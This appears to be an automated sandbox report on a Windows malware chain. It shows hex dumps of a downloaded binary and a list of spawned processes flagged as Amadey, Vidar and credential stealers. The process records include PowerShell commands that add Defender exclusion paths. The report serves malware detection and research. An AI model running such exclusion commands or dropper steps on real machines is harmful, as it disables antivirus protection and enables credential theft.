                                                                                                                                                                                                                                                            2024-12-21 21:20:00 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 77 a5 6d d7 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 8a 0e 00 00 28 01 00 00 00 00 00 9e a8 0e 00 00 20 00 00 00 c0 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 10 00 00 02 00 00 c5 c5 10 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELwm"0( @ `
                                                                                                                                                                                                                                                            2024-12-21 21:20:00 UTC16384INData Raw: 01 00 06 2a 28 07 01 00 0a 72 5e 14 00 70 03 8c 9c 00 00 02 28 08 01 00 0a 73 09 01 00 0a 7a 00 13 30 05 00 99 00 00 00 16 00 00 11 02 28 10 01 00 0a 2d 09 02 6f 11 01 00 0a 03 31 1b 28 07 01 00 0a 72 b6 14 00 70 03 8c d2 00 00 01 28 08 01 00 0a 73 09 01 00 0a 7a 02 17 8d db 00 00 01 25 16 1f 2e 9d 6f 12 01 00 0a 0a 06 8e 69 18 32 0b 06 16 9a 6f 11 01 00 0a 04 2e 16 28 07 01 00 0a 72 1c 14 00 70 02 28 08 01 00 0a 73 09 01 00 0a 7a 17 0b 2b 29 06 07 9a 12 02 28 13 01 00 0a 2d 19 28 07 01 00 0a 72 41 15 00 70 02 06 07 9a 28 14 01 00 0a 73 09 01 00 0a 7a 07 17 58 0b 07 06 8e 69 32 d1 2a 00 00 00 13 30 03 00 58 00 00 00 17 00 00 11 28 15 01 00 0a 0b 12 01 28 0a 01 00 0a 0a 02 7b 07 02 00 04 2d 0a 06 16 1f 0c 28 16 01 00 0a 2a 17 02 7b 07 02 00 04 33 0f 06 28
                                                                                                                                                                                                                                                            Data Ascii: *(r^p(sz0(-o1(rp(sz%.oi2o.(rp(sz+)(-(rAp(szXi2*0X(({-(*{3(
                                                                                                                                                                                                                                                            2024-12-21 21:20:00 UTC16384INData Raw: 00 c8 42 0a 2b 0a 22 00 00 00 00 0a 2b 02 02 0a 06 2a 7e 02 20 ff 00 00 00 31 09 20 ff 00 00 00 10 00 2b 07 02 16 2f 03 16 10 00 02 28 10 02 00 0a 2a 2e 22 00 00 7f 43 80 bd 02 00 04 2a 96 02 03 6c 23 00 00 00 00 00 00 58 40 5b 7d be 02 00 04 02 04 6c 23 00 00 00 00 00 00 58 40 5b 7d bf 02 00 04 2a 1e 02 7b be 02 00 04 2a 1e 02 7b bf 02 00 04 2a 13 30 04 00 74 00 00 00 54 00 00 11 d0 11 01 00 01 28 4e 01 00 0a 72 ae 2d 00 70 1f 28 28 11 02 00 0a 0a 06 14 28 12 02 00 0a 2c 0a 1f 60 1f 60 73 52 02 00 06 2a d0 11 01 00 01 28 4e 01 00 0a 72 b8 2d 00 70 1f 28 28 11 02 00 0a 0b 07 14 28 12 02 00 0a 2c 0a 1f 60 1f 60 73 52 02 00 06 2a 06 14 14 6f 13 02 00 0a a5 d8 00 00 01 07 14 14 6f 13 02 00 0a a5 d8 00 00 01 73 52 02 00 06 2a 1e 02 7b c3 02 00 04 2a 3a 02 28
                                                                                                                                                                                                                                                            Data Ascii: B+"+*~ 1 +/(*."C*l#X@[}l#X@[}*{*{*0tT(Nr-p(((,``sR*(Nr-p(((,``sR*oosR*{*:(
                                                                                                                                                                                                                                                            2024-12-21 21:20:00 UTC16384INData Raw: c6 01 00 0a 74 06 00 00 1b 0c 02 7c a2 03 00 04 08 07 28 33 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 02 00 3f 00 00 00 93 00 00 11 12 00 28 28 01 00 0a 7d ee 05 00 04 12 00 02 7d f0 05 00 04 12 00 03 7d ef 05 00 04 12 00 15 7d ed 05 00 04 12 00 7c ee 05 00 04 12 00 28 41 00 00 2b 12 00 7c ee 05 00 04 28 2a 01 00 0a 2a 00 13 30 02 00 3f 00 00 00 94 00 00 11 12 00 28 28 01 00 0a 7d f4 05 00 04 12 00 02 7d f5 05 00 04 12 00 03 7d f6 05 00 04 12 00 15 7d f3 05 00 04 12 00 7c f4 05 00 04 12 00 28 42 00 00 2b 12 00 7c f4 05 00 04 28 2a 01 00 0a 2a 00 13 30 02 00 4f 00 00 00 95 00 00 11 12 00 28 f3 02 00 0a 7d e6 05 00 04 12 00 02 7d e9 05 00 04 12 00 03 7d ea 05 00 04 12 00 04 7d e7 05 00 04 12 00 05 7d e8 05 00 04 12 00 15 7d e5 05 00 04 12 00 7c e6 05 00 04
                                                                                                                                                                                                                                                            Data Ascii: t|(3+3*0?((}}}}|(A+|(**0?((}}}}|(B+|(**0O(}}}}}}|
                                                                                                                                                                                                                                                            2024-12-21 21:20:00 UTC16384INData Raw: 14 02 1f fe 7d c6 05 00 04 02 7c c7 05 00 04 08 28 b3 03 00 0a 2a 00 00 01 1c 00 00 00 00 11 00 89 9a 00 26 31 00 00 01 00 00 0e 00 b6 c4 00 19 31 00 00 01 36 02 7c c7 05 00 04 03 28 b4 03 00 0a 2a 00 00 1b 30 03 00 bf 00 00 00 b1 00 00 11 02 7b cb 05 00 04 0a 02 7b cd 05 00 04 0b 06 2c 3b 07 02 7b ce 05 00 04 28 9f 03 00 06 6f 4d 03 00 0a 0d 12 03 28 22 03 00 0a 2d 3c 02 16 25 0a 7d cb 05 00 04 02 09 7d cf 05 00 04 02 7c cc 05 00 04 12 03 02 28 7b 00 00 2b de 72 02 7b cf 05 00 04 0d 02 7c cf 05 00 04 fe 15 84 00 00 1b 02 15 25 0a 7d cb 05 00 04 12 03 28 23 03 00 0a 2d 04 16 0c de 35 07 7b 84 03 00 04 13 04 11 04 2c 0c 11 04 6f 90 03 00 0a 14 fe 03 2b 01 16 0c de 19 13 05 02 1f fe 7d cb 05 00 04 02 7c cc 05 00 04 11 05 28 24 03 00 0a de 14 02 1f fe 7d cb
                                                                                                                                                                                                                                                            Data Ascii: }|(*&116|(*0{{,;{(oM("-<%}}|({+r{|%}(#-5{,o+}|($}
                                                                                                                                                                                                                                                            2024-12-21 21:20:00 UTC16384INData Raw: 56 80 c3 74 4a 31 56 80 c8 83 4a 31 56 80 e9 03 4a 31 56 80 ee 06 4a 31 56 80 87 e2 4a 31 56 80 78 91 4a 31 56 80 32 71 4a 31 56 80 7a e2 4a 31 11 00 64 6a 4a 31 56 80 23 16 ca 2f 31 00 4d 8d 4f 31 06 06 5b 1b ca 2f 56 80 fd 6b 54 31 56 80 e6 95 54 31 56 80 63 1b 54 31 56 80 aa 1d 54 31 56 80 d0 24 54 31 06 06 5b 1b ca 2f 56 80 ac d5 59 31 56 80 a0 59 59 31 56 80 a5 59 59 31 56 80 2a 87 59 31 01 00 fd 3a 5e 31 01 00 85 4d ca 2f 01 00 97 45 80 0a 01 00 28 3c 80 0a 01 00 aa 42 80 0a 01 00 2a 45 80 0a 01 00 a5 4e ca 2f 01 00 2a 54 80 0a 01 00 4f 48 80 0a 31 00 fb c6 63 31 21 00 76 a1 c7 30 11 00 6e 22 80 0a 11 00 5a 22 80 0a 11 00 15 65 80 0a 11 00 65 21 80 0a 11 00 b0 22 80 0a 04 00 f3 d9 05 30 11 00 c8 a4 ca 2f 11 00 da d1 80 0a 11 00 56 8c 80 0a 11 00 d2
                                                                                                                                                                                                                                                            Data Ascii: VtJ1VJ1VJ1VJ1VJ1VxJ1V2qJ1VzJ1djJ1V#/1MO1[/VkT1VT1VcT1VT1V$T1[/VY1VYY1VYY1V*Y1:^1M/E(<B*EN/*TOH1c1!v0n"Z"ee!"0/V
                                                                                                                                                                                                                                                            2024-12-21 21:20:00 UTC16384INData Raw: 66 cd 8f 3c b2 02 f8 c5 00 00 00 00 86 08 97 cd 8f 3c b2 02 48 c6 00 00 00 00 86 08 05 cd 8f 3c b2 02 f8 c6 00 00 00 00 86 18 ee a9 01 00 b2 02 1c c7 00 00 00 00 81 00 3f 26 1b 39 b2 02 3c c7 00 00 00 00 c4 00 0a 28 91 15 b4 02 cb c7 00 00 00 00 81 00 bc 7e 0f 38 b5 02 00 c8 00 00 00 00 81 00 9d 26 b0 0d b7 02 3c c8 00 00 00 00 81 00 6d 9f 01 00 b9 02 b4 c8 00 00 00 00 81 00 b1 82 95 3c b9 02 10 c9 00 00 00 00 86 08 3e e5 e3 16 ba 02 22 c9 00 00 00 00 86 08 4d e5 07 16 ba 02 30 c9 00 00 00 00 86 08 cc 7b 69 15 bb 02 42 c9 00 00 00 00 86 08 d9 7b 19 10 bb 02 55 c9 00 00 00 00 86 08 e6 67 9f 3c bc 02 67 c9 00 00 00 00 86 08 f4 67 0e 16 bc 02 7a c9 00 00 00 00 86 08 2b d5 a5 3c bd 02 8c c9 00 00 00 00 86 08 3a d5 15 16 bd 02 9f c9 00 00 00 00 86 08 1d 80 ad
                                                                                                                                                                                                                                                            Data Ascii: f<<H<?&9<(~8&<m<>"M0{iB{Ug<ggz+<:
                                                                                                                                                                                                                                                            2024-12-21 21:20:00 UTC16384INData Raw: 2b 0a 11 08 76 72 31 0a e1 01 e7 8b 3a 0a 21 08 ee a9 f2 06 e1 01 88 7e 4d 0a 79 04 ee a9 f2 06 21 04 e8 24 54 0a 89 03 76 72 61 0a 89 03 d3 dc ad 06 89 03 f7 84 6d 0a e1 01 5f 9d a8 00 51 05 e1 e7 73 0a 81 06 53 e9 80 0a 81 06 d3 d1 83 0a 81 04 6b 7e ad 01 4c 02 ee a9 21 08 54 02 ee a9 ae 0a 5c 02 ee a9 01 0b 39 01 cb 74 1b 0b 64 02 ee a9 67 0b 6c 02 ee a9 b6 0b 61 01 f6 c4 09 0c 74 02 ee a9 1b 0c 7c 02 ee a9 4d 0c 81 06 d3 d1 91 0c 84 02 ee a9 4d 0c 8c 02 ee a9 b6 0b 94 02 ee a9 4d 0c 29 03 ee a9 1e 00 81 06 4b e9 f8 05 c1 01 5b 7e 70 09 29 03 ba 58 52 0d 29 08 d3 6f 5f 0d 81 06 d0 d6 ad 01 81 06 d3 d1 65 0d c1 03 ee a9 01 00 21 04 b1 df 8c 00 31 08 ec 83 54 0a 91 07 e5 7a 6c 0d 29 01 b8 6b 7d 0d d1 06 9e 64 89 0d 29 01 6e 7b 7d 0d bc 01 93 d5 87 00 bc
                                                                                                                                                                                                                                                            Data Ascii: +vr1:!~My!$Tvram_QsSk~L!T\9tdglat|MMM)K[~p)XR)o_e!1Tzl)k}d)n{}
                                                                                                                                                                                                                                                            2024-12-21 21:20:00 UTC16384INData Raw: 8b 00 be 26 20 92 8b 00 be 26 40 92 8b 00 be 26 60 92 8b 00 be 26 80 92 8b 00 be 26 a0 92 8b 00 be 26 c0 92 8b 00 be 26 e0 92 8b 00 be 26 00 93 8b 00 be 26 80 93 8b 00 be 26 a0 93 8b 00 be 26 20 94 8b 00 be 26 40 94 8b 00 be 26 20 95 8b 00 be 26 40 95 8b 00 be 26 60 95 8b 00 be 26 80 95 8b 00 be 26 81 95 2b 01 56 4c a0 95 8b 00 be 26 c0 95 8b 00 be 26 e0 95 8b 00 be 26 00 96 8b 00 be 26 20 96 8b 00 be 26 21 96 42 05 f2 34 40 96 8b 00 be 26 41 96 42 05 f2 34 61 96 42 05 f2 34 c0 96 8b 00 be 26 e0 96 8b 00 be 26 00 97 8b 00 be 26 20 97 8b 00 be 26 40 97 8b 00 be 26 60 97 8b 00 be 26 80 97 8b 00 be 26 a0 97 8b 00 be 26 c0 97 8b 00 be 26 e0 97 8b 00 be 26 00 98 8b 00 be 26 20 98 8b 00 be 26 40 98 8b 00 be 26 60 98 8b 00 be 26 e0 98 8b 00 be 26 00 99 8b 00 be
                                                                                                                                                                                                                                                            Data Ascii: & &@&`&&&&&&&& &@& &@&`&&+VL&&&& &!B4@&AB4aB4&&& &@&`&&&&&& &@&`&&
                                                                                                                                                                                                                                                            2024-12-21 21:20:00 UTC16384INData Raw: 00 43 4c 53 43 54 58 5f 52 45 53 45 52 56 45 44 33 00 50 75 72 63 68 61 73 65 46 61 69 6c 65 64 56 33 00 50 75 72 63 68 61 73 65 43 6f 6d 70 6c 65 74 65 64 56 33 00 3c 67 65 74 4d 61 74 75 72 69 74 79 54 61 73 6b 3e 35 5f 5f 33 00 3c 47 65 74 4d 61 74 75 72 69 74 79 52 61 74 69 6e 67 41 73 79 6e 63 3e 62 5f 5f 33 00 3c 46 69 6e 64 43 6c 6f 73 65 73 74 4c 61 6e 67 75 61 67 65 3e 62 5f 5f 33 00 3c 43 72 65 61 74 65 41 73 79 6e 63 3e 64 5f 5f 33 00 3c 47 65 74 41 6e 63 65 73 74 6f 72 73 3e 64 5f 5f 33 00 56 61 6c 75 65 54 75 70 6c 65 60 33 00 49 74 65 6d 33 00 53 68 69 6d 6d 65 72 33 00 3c 43 68 65 63 6b 46 6f 72 55 70 64 61 74 65 73 41 73 79 6e 63 3e 64 5f 5f 31 34 00 3c 3e 66 5f 5f 41 6e 6f 6e 79 6d 6f 75 73 54 79 70 65 35 60 31 34 00 3c 3e 66 5f 5f 41 6e
                                                                                                                                                                                                                                                            Data Ascii: CLSCTX_RESERVED3PurchaseFailedV3PurchaseCompletedV3<getMaturityTask>5__3<GetMaturityRatingAsync>b__3<FindClosestLanguage>b__3<CreateAsync>d__3<GetAncestors>d__3ValueTuple`3Item3Shimmer3<CheckForUpdatesAsync>d__14<>f__AnonymousType5`14<>f__An


                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                                            Start time:16:14:55
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                            Imagebase:0xbc0000
                                                                                                                                                                                                                                                            File size:3'272'704 bytes
                                                                                                                                                                                                                                                            MD5 hash:AEFBD9E285960B704524B4C33B0C9567
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                                            Start time:16:14:57
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                                            Imagebase:0xea0000
                                                                                                                                                                                                                                                            File size:3'272'704 bytes
                                                                                                                                                                                                                                                            MD5 hash:AEFBD9E285960B704524B4C33B0C9567
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1741470474.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 53%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                                            Start time:16:14:58
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            Imagebase:0xea0000
                                                                                                                                                                                                                                                            File size:3'272'704 bytes
                                                                                                                                                                                                                                                            MD5 hash:AEFBD9E285960B704524B4C33B0C9567
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1747399755.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                                                            Start time:16:16:00
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            Imagebase:0xea0000
                                                                                                                                                                                                                                                            File size:3'272'704 bytes
                                                                                                                                                                                                                                                            MD5 hash:AEFBD9E285960B704524B4C33B0C9567
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                                                            Start time:16:16:13
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1019663001\a2870b1ac5.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1019663001\a2870b1ac5.exe"
                                                                                                                                                                                                                                                            Imagebase:0xfa0000
                                                                                                                                                                                                                                                            File size:2'668'544 bytes
                                                                                                                                                                                                                                                            MD5 hash:87330F1877C33A5A6203C49075223B16
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 22%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                                                            Start time:16:16:20
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe"
                                                                                                                                                                                                                                                            Imagebase:0x2d0000
                                                                                                                                                                                                                                                            File size:776'832 bytes
                                                                                                                                                                                                                                                            MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 68%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                                            Start time:16:16:21
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                                                            Start time:16:16:24
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe"
                                                                                                                                                                                                                                                            Imagebase:0x2d0000
                                                                                                                                                                                                                                                            File size:776'832 bytes
                                                                                                                                                                                                                                                            MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.2841686209.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.2795246224.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.2814280047.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.2797362552.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                                            Start time:16:16:26
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe"
                                                                                                                                                                                                                                                            Imagebase:0x160000
                                                                                                                                                                                                                                                            File size:22'016 bytes
                                                                                                                                                                                                                                                            MD5 hash:04F57C6FB2B2CD8DCC4B38E4A93D4366
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2959431174.0000000003497000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 57%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                                                            Start time:16:16:26
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                                                            Start time:16:16:28
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"powershell.exe" Add-MpPreference -ExclusionPath "C:\agfznulwo"
                                                                                                                                                                                                                                                            Imagebase:0xb20000
                                                                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                                                            Start time:16:16:28
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                                            Start time:16:16:34
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                                                                                                                                                                                                                                                            Imagebase:0xb20000
                                                                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                                                            Start time:16:16:34
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                                                            Start time:16:16:38
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7e0000
                                                                                                                                                                                                                                                            File size:4'419'072 bytes
                                                                                                                                                                                                                                                            MD5 hash:0FF2001AEABB55D9AC0BFEB28C577633
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:false

